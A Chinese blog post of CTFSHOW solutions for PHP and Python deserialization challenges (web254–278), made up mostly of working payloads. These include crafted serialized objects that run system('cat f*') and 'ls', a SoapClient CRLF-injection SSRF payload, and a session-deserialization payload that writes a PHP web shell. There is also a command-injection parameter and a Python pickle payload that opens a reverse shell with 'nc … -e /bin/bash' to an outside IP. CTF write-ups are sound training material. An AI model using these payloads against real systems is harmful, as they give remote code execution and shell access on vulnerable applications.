CTFSHOW—反序列化

最新推荐文章于 2024-05-10 17:17:12 发布
最新推荐文章于 2024-05-10 17:17:12 发布
阅读量2.4k 收藏
点赞数 2
分类专栏: CTFSHOW刷题记录
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45449318/article/details/114648189
版权

web254
?username=xxxxxx&password=xxxxxx
web255

GET /?username=xxxxxx&password=xxxxxx HTTP/1.1
Host: d66c6632-05e8-4703-9bac-14213020568d.challenge.ctf.show:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Cookie: user=%4f%3a%31%31%3a%22%63%74%66%53%68%6f%77%55%73%65%72%22%3a%33%3a%7b%73%3a%38%3a%22%75%73%65%72%6e%61%6d%65%22%3b%73%3a%36%3a%22%78%78%78%78%78%78%22%3b%73%3a%38%3a%22%70%61%73%73%77%6f%72%64%22%3b%73%3a%36%3a%22%78%78%78%78%78%78%22%3b%73%3a%35%3a%22%69%73%56%69%70%22%3b%73%3a%34%3a%22%74%72%75%65%22%3b%7d
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0

web256
输入的username和序列化的一样,password不一样。

<?php

class ctfShowUser{
    public $isVip=true;
    public $username='wa1ki0g';
}
echo serialize(new ctfShowUser);

web257

<?php
class ctfShowUser{
    private $class;
    public function __construct(){
        $this->class=new backDoor();
    }
}
class backDoor{
    private $code='system("cat f*");';
}
$b=new ctfShowUser();
echo urlencode(serialize($b));

以前做过,写wp的时候会环境打不开,直接搬了别人的
也可以不用:
(知识点:php7.1+反序列化对类属性不敏感
利用php特定版本下对private和public不敏感的特性构造)

web258
正则可以直接加个+绕过

GET /?username=xxxxxx&password=xxxxx HTTP/1.1
Host: 6d77bae1-031e-473d-a426-44f8fd1e4c9b.challenge.ctf.show:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Cookie: user=O%3A%2B11%3A%22ctfShowUser%22%3A4%3A%7Bs%3A8%3A%22username%22%3Bs%3A6%3A%22xxxxxx%22%3Bs%3A8%3A%22password%22%3Bs%3A6%3A%22xxxxxx%22%3Bs%3A5%3A%22isVip%22%3Bb%3A0%3Bs%3A5%3A%22class%22%3BO%3A%2B8%3A%22backDoor%22%3A1%3A%7Bs%3A4%3A%22code%22%3Bs%3A13%3A%22system%28%22ls%22%29%3B%22%3B%7D%7D
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0

执行了ls
web259
在这里插入图片描述

利用点:SoapClient::__call+ssrf
在这里插入图片描述
可以看到soapaction可以被控制
但Content-Type在SOAPAction的上面,就无法控制Content-Typ,也就不能控制POST的数据,在header里User-Agent在Content-Type前面,可以利用User-Agent进行注入CRLF
payload:

<?php
$target = 'http://127.0.0.1/flag.php';
$post_string = 'token=ctfshow';
$b = new SoapClient(null,array('location' => $target,'user_agent'=>'wa1ki0g^^X-Forwarded-For:127.0.0.1,127.0.0.1^^Content-Type: application/x-www-form-urlencoded'.'^^Content-Length: '.(string)strlen($post_string).'^^^^'.$post_string,'uri' => "aaab"));
$a = serialize($b);
$a = str_replace('^^',"\r\n",$a);
echo urlencode($a);
?>

这里uri是必须要有的,要不序列化的时候会报错。
web260
ctfhsow=ctfshow_i_love_36D
web261
不会,就告诉了有个反序列化的参数我哪知道要干嘛。。。
web262
发现可以用replace进行反序列化字符逃逸,看了半天,但是没发现利用的点,后来看注释发现还有个message.php。。。访问发现只要token=admin就可以得到flag。
利用点:序列化后进行str_replace(‘fuck’, ‘loveU’, serialize($msg))

27个字符:";s:5:“token”;s:5:“admin”;},利用replace函数逃逸出27个字符就好

f=wa1ki0g&m=0x4e&t=1fuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuck";s:5:"token";s:5:"admin";}

web263
session反序列化
在这里插入图片描述
不同引擎存储的方式不同的是。
PHP中的Session的实现是没有的问题,危害主要是由于程序员的Session使用不当而引起的
如果在PHP在反序列化存储的$_SESSION数据时使用的引擎和序列化使用的引擎不一样,会导致数据无法正确反序列化。通过精心构造的数据包,就可以绕过程序的验证或者是执行一些系统的方法
在这里插入图片描述
其实总的来说就是利用session.serialize_handler与php.ini的配置不同引起的反序列化的问题。

<?php
class User{
    public $username='wa1ki0g.php';
    public $password='<?php system("cat f*");?>';
    public $status;

}
$a=new User();
echo base64_encode('|'.serialize($a));

访问首页,抓包修改 cookie中的limit值 为序列化后的字符串,访问 check.php,成功写入shell
web264
同262做法

f=wa1ki0g&m=0x4e&t=1fuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuck";s:5:"token";s:5:"admin";}

GET /?f=wa1ki0g&m=0x4e&t=1fuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuck%22;s:5:%22token%22;s:5:%22admin%22;} HTTP/1.1
Host: 363fb3f9-0ec8-4e28-94d5-09abee4a4684.challenge.ctf.show:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=s5v4jbhmifaf7mev8tra99ree1
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0


GET /message.php HTTP/1.1
Host: 363fb3f9-0ec8-4e28-94d5-09abee4a4684.challenge.ctf.show:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=s5v4jbhmifaf7mev8tra99ree1;msg=1;
Upgrade-Insecure-Requests: 1

web265
学过c++或者系统学过php的都知道有个引用的语法糖。可以自行查一下

<?php
class ctfshowAdmin{
    public $token;
    public $password;


    public function login(){
        return $this->token===$this->password;
    }
	
}
$a=new ctfshowAdmin();
$a->token=&$a->password;
$a=urlencode(serialize($a));
echo $a;

web266
php对类的名不分大小写,可以大小写直接绕过正则。
因为用的是php://input,直接post一个序列化的字符串调用__destruct()函数即可

<?php
class ctfshow{
    public $username='xxxxxx';
    public $password='xxxxxx';
    public function login(){
        return $this->username===$this->password;
    }
    public function __toString(){
        return $this->username;
    }
    public function __destruct(){
        global $flag;
        echo $flag;
    }
}
$a=new ctfshow();
$a->username='wa1ki0g';
$a->password='wa1ki0g';
echo ((serialize($a)));

web267-270
yii框架的反序列化漏洞
直接搜个现成的exp打就可以
可以参考着这个来:
https://www.cnblogs.com/thresh/p/13743081.html
都直接搜的exp打的,有空好好分析下这些链。
web271-273
laravel5.7和5.8的洞,直接搜下打就好了,有空都复现分析下。
web274
thinkphp5.1的反序列化漏洞,好像上次湖湘杯线下也有这个。
web275
__destruct析构函数可以执行命令

?fn=;cat flag.php
flag=wa1ki0g

web276
看见了file_put_contents这个文件操作函数,觉得应该是phar反序列化,明天再写吧,困了。。。
web277-278
F12看见了pickle.loads,python反序列化没跑。python的反序列化洞其实就是python在序列化的时候会把类中的方法也序列化成字节码,并且反序列化的时候会执行。
没回显,直接vps监听个端口弹个shell回去就好

import pickle
import base64
class Wa1ki0g(object):
	def __reduce__(self):
		return(eval,('__import__("os").popen("nc 49.234.61.68 8000 -e /bin/bash").read()',))
print(base64.b64encode(pickle.dumps(Wa1ki0g())))

要注意这个object是必须要写的
没vps用dns外带下也可以

qq_45449318
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 6
    评论
专栏目录
ctfshow————反序列化
qq_45655564的博客
06-30 788
web254 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-12-02 17:44:47 # @Last Modified by: h1xa # @Last Modified time: 2020-12-02 19:29:02 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ error_reporting(0); highlight_file(__
CTF-web_php_serialize反序列化
Be Smart
02-24 844
一.根据题目猜测和反序列化漏洞有关 1.思路: 进入实验环境后,发现是一段php代码,通过接受get请求方式将提交过来的var的值, 先进行base64解码,再进行正则的判断,如果不匹配成功就会反序列化输入的参数值。 所以这里我们目的就是为了绕过正则表达式,让其反序列化出我们要的fl4g.php,再通过析构函数,高亮出fl4g文件中的内容。 2.步骤: 通过代码中的注释我们发现flag在fl4g.php这个文件里面,所以我们要将其序列化 编写一段代码先实例化我们要序列化的类,这里吧fl4g.php传进去,
ctfshow web入门 php反序列化 web267--web270
最新发布
2301_81040377的博客
05-10 388
查看源代码发现这三个页面。然后发现登录页面直接。
CTF-反序列化
qq_61774705的博客
08-15 4352
反序列化
CTF-反序列化(持续更新)
m0_74317362的博客
07-27 766
魔术方法__construct() 当一个对象创建时自动调用__destruct() 当对象被销毁时自动调用 (php绝大多数情况下会自动调用销毁对象)__sleep() 使**用serialize()函数时触发__wakeup 使用unserialse()**函数时会自动调用__toString 当一个对象被当作一个字符串被调用。__call() 在对象上下文中调用不可访问的方法时触发__callStatic() 在静态上下文中调用不可访问的方法时触发。
CTFshow-WEB入门-反序列化
feng的博客
02-14 5518
前言 简单的反序列化直接给出payload,有意思的,较为复杂的和我不太会的会分析一波。 web254 ?username=xxxxxx&password=xxxxxx web255 <?php class ctfShowUser{ public $username='xxxxxx'; public $password='xxxxxx'; public $isVip=true; } echo urlencode(serialize(new ctfShowUser())
java反序列化工具
11-21
Java反序列化是一种将已序列化的对象状态转换回对象的过程,它是Java平台中持久化数据的一种常见方式。在Java应用程序中,序列化用于保存对象的状态以便稍后恢复,或者在网络间传输对象。然而,这个过程也可能引入...
反序列化工具
11-14
Java反序列化是一种将已序列化的对象状态转换回对象的过程,通常用于持久化数据或在网络间传输对象。在Java中,这个过程涉及到`ObjectInputStream`类的`readObject()`方法,它能够读取由`ObjectOutputStream`的`...
c#序列化和反序列化
05-24
什么叫反序列化? 就是再把介质中的东西还原成对象,把石子还原成人的过程。 在进行这些操作的时候都需要这个可以被序列化,要能被序列化,就得给类头加[Serializable]特性。 通常网络程序为了传输安全才这么做。不...
序列化与反序列化
12-21
序列化与反序列化 概述 序列化: 就是使用流的技术将对象中的数据保存到文件中。 反序列化: 就是使用流的技术将文件中的数据读取到对象中。 使用到的流技术 序列化:ObjectOutputStream 反序列化:...
C# xml序列化和反序列化
01-05
在C#编程中,XML序列化和反序列化是一项重要的技术,它允许我们将对象的状态转换为XML格式的数据,以及将XML数据恢复为等效的对象。这在数据存储、网络传输和配置文件等方面都有广泛的应用。以下是对这个主题的详细...
原理+实践掌握(PHP反序列化和Session反序列化)
bylfsj的博客
03-22 1709
<p></p><h2 id="toc-0">前言:</h2> 最近又接触了几道php反序列化的题目,觉得对反序列化的理解又加深了一点,这次就在之前的学习的基础上进行补充。 0x00:PHP序列化 函数 : serialize() 所有php里面的值都可以使用函数serialize()来返回一个包含字节流的字符串来表...
CTF php反序列化总结
m0_53567065的博客
11-17 4447
前言:本⼈⽔平不⾼,只能做⼀些类似收集总结这样的⼯作,本篇文章是我自己在学php反序列化写的一篇姿势收集与总结,有不对的地方欢迎师傅们批评指正~定义:序列化就是将对象转换成字符串。反序列化相反,数据的格式的转换对象的序列化利于对象的保存和传输,也可以让多个文件共享对象。漏洞原理:未对用户输入的序列化字符串进行检测,导致攻击者可以控制反序列化的过程,从而导致代码执行,SQL注入,目录遍历等不可控后果。在反序列化的过程中自动触发了某些魔术方法。当进行反序列化的时候就有可能会触发对象中的一些魔术方法。常用魔术方法
CTF中的PHP反序列化ALL IN ONE
热门推荐
Love&Share
09-01 1万+
CTF中的PHP反序列化 1.反序列化的基础知识 什么是序列化,反序列化,php反序列化,序列化字符串知识,漏洞产生原因,修复方法 php反序列化漏洞,又叫php对象注入漏洞,是ctf中常见的漏洞。 PHP基础知识 PHP类与对象(https://www.php.net/manual/zh/language.oop5.php) PHP魔术方法(https://secure.php.net/manual/zh/language.oop5.magic.php) 序列化定义 php程序为了保存和转储对象,提供了序
----已搬运----2021.6.1 NEWSCTF 萌新赛 -- Web --- weblog ---反序列化
Zero_Adam的博客
06-05 390
目录:一、学到的知识二、学习WP怎么反序列化都是失败了。还能够成功destruct啊。 一、学到的知识 这个代码审计,专门给字符逃逸用的过滤的东西要用上, 关于思路,可以先慢慢来,一步一步debug看看我们需不需要字符逃逸,逃逸那些东西,在哪里进行逃逸。 二、学习WP 这个题,最后还是云里雾里的,,没有弄得十分清楚 直接给了源码: <?php highlight_file(__FILE__); error_reporting(0); class B{ public $logFile;
CTF之萌新反序列化学习
bmth666的博客
01-13 5214
概念 数据(变量)序列化(持久化) 将一个变量的数据“转换为”字符串,但并不是类型转换,目的是将该字符串储存在本地。相反的行为称为反序列化。 序列化和反序列化的目:使得程序间传输对象会更加方便 # 相关函数 ...
记一道CTF中的phar反序列化
qq_53886354的博客
08-14 2350
通过config的值去控制文件读写, 审计一下正则发现基本上把伪协议都过滤了, 直接new getflag也不行,这种情况下十六进制类名也绕不了,再仔细审计一下发现虽然phar伪协议没有作限制。这一块实在是没什么思路去绕过, 于是参考了一下xenny和atao两位师傅的wp, 此处用的是xenny师傅的思路, 修改文件内容 -> 签名修复 -> 文件上传。, 大致原理就是用其他的压缩格式再对phar文件进行压缩达到混淆的效果, 部分压缩格式混淆过的phar内容同样可以直接被phar://伪协议解析。....
phar反序列化+两道CTF例题
unexpectedthing的博客
02-14 6448
Phar反序列化 phar文件本质上是一种压缩文件,会以序列化的形式存储用户自定义的meta-data。当受影响的文件操作函数调用phar文件时,会自动反序列化meta-data内的内容。(漏洞利用点) 什么是phar文件 在软件中,PHAR(PHP归档)文件是一种打包格式,通过将许多PHP代码文件和其他资源(例如图像,样式表等)捆绑到一个归档文件中来实现应用程序和库的分发 php通过用户定义和内置的“流包装器”实现复杂的文件处理功能。内置包装器可用于文件系统函数,如(fopen(),copy(),file
利用PHAR协议进行PHP反序列化攻击
Jeeseen123的博客
06-28 402
PHAR (“Php ARchive”) 是PHP中的打包文件,相当于Java中的JAR文件,在php5.3或者更高的版本中默认开启。PHAR文件缺省状态是只读的,当我们要创建一个Phar文件需要修改php.ini中的phar.readonly,修改为:phar.readonly = 0 当通过phar://协议对phar文件进行文件操作时,将会对phar文件中的Meta-data进行反序列化操作,可能造成一些反序列化漏洞。 本文由锦行科技的安全研究团队提供,从攻击者的角度展示了PHAR反序列化攻击的原理和
ctfshow反序列化
09-09
引用中的代码展示了一个类`ctfshow`,其中包含了一个`__destruct`方法,该方法...综上所述,ctfshow的反序列化攻击可以通过构造恶意的序列化payload来利用`__destruct`方法或弱比较漏洞来执行任意代码或获取敏感信息。
评论 6
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值